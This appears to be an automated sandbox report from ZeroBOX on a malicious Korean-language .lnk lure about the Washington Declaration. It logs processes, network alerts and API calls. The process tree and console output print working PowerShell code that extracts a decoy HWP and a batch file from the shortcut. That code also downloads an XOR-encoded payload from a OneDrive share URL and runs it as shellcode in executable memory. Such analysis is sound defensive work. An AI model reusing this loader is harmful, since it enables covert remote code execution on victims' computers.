Summary | ZeroBOX

워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk

Category Machine Started Completed
FILE s1_win7_x6402 May 10, 2023, 9:13 a.m. May 10, 2023, 9:15 a.m.
Size 50.8MB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=1, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 445e7fd6bb684420d6b8523fe0c55228
SHA256 2d381a0156d8b0468d10dfd347b32cf10f97026e248ccd95edbcd28030ade4d4
CRC32 02E0635B
ssdeep 1536:50bUiut8Ihn1XwS8wqYQrdb9YNSxpL/Y819G:5YPdIhN4dqNqpL/Yk9G
Yara
  • HWP_file_format - HWP Document File
  • Microsoft_Office_File_Zero - Microsoft Office File
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

  • cmd.exe (PID 3012) "C:\Windows\System32\cmd.exe" /c start /wait "ySYsgYc" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk"
    • cmd.exe (PID 2200) "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
      • powershell.exe (PID 2220) powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
        • Hwp.exe (PID 2428) "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp"
        • cmd.exe (PID 284) cmd /c ""C:\Users\test22\AppData\Local\Temp\230509.bat""
          • cmd.exe (PID 452) c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint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moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
            • powershell.exe (PID 2548) powershell -windowstyle hidden -command "$pull ="$saint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moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49220 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49221 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49219 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49212 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49227 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49222 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49223 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49224 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49216 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49230 -> 13.107.42.12:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1 192.168.56.102:49219 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49221 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49212 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49220 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49222 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49227 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49223 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49224 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49216 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf
TLSv1 192.168.56.102:49230 -> 13.107.42.12:443 C=US, O=Microsoft Corporation, CN=Microsoft Azure TLS Issuing CA 01 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, CN=storage.live.com 99:18:79:4d:bc:a1:b2:3d:19:ab:b7:fb:69:fa:cd:ce:88:36:e5:bf

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /min c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint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moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: upported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:28
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ityProtocolType], 3072);$aa='[DllImport("kernel32.dll")]public static extern In
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: tPtr GlobalAlloc(uint b,uint c);';$b=Add-Type -MemberDefinition $aa -Name "AAA"
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: -PassThru;$abab = '[DllImport("kernel32.dll")]public static extern bool Virtu
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: alProtect(IntPtr a,uint b,uint c,out IntPtr d);';$aab=Add-Type -MemberDefinitio
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: n $abab -Name "AAB" -PassThru;$c = New-Object System.Net.WebClient;$d="https://
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRmTWdo
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ZExudm9zdUExcHc_ZT1scUoweWU/root/content";$bb='[DllImport("kernel32.dll")]publi
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: c static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,In
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: tPtr f);';$ccc=Add-Type -MemberDefinition $bb -Name "BBB" -PassThru;$ddd='[DllI
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: mport("kernel32.dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: uint b);';$fff=Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru;$e=112;do
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: { try { $c.Headers["user-agent"] = "connnecting...";$xmpw4=$c.DownloadData($d)
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: ;$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100);$old = 0;$aab::VirtualProte
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: ct($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);for ($h = 1;$h -lt $xmpw4.Length;
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: $h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: h] -bxor $xmpw4[0]) );};try{throw 1;}catch{$handle=$ccc::CreateThread(0,0,$x0,0
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: ,0,0);$fff::WaitForSingleObject($handle, 500*1000);};$e=222;}catch{sleep 11;$e=
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: 112;}}while($e -eq 112);
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000137
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038dbd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038d7d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038d2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038ddd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038dc90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0038d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002642a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00264920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002643e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73922000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02683000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02684000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
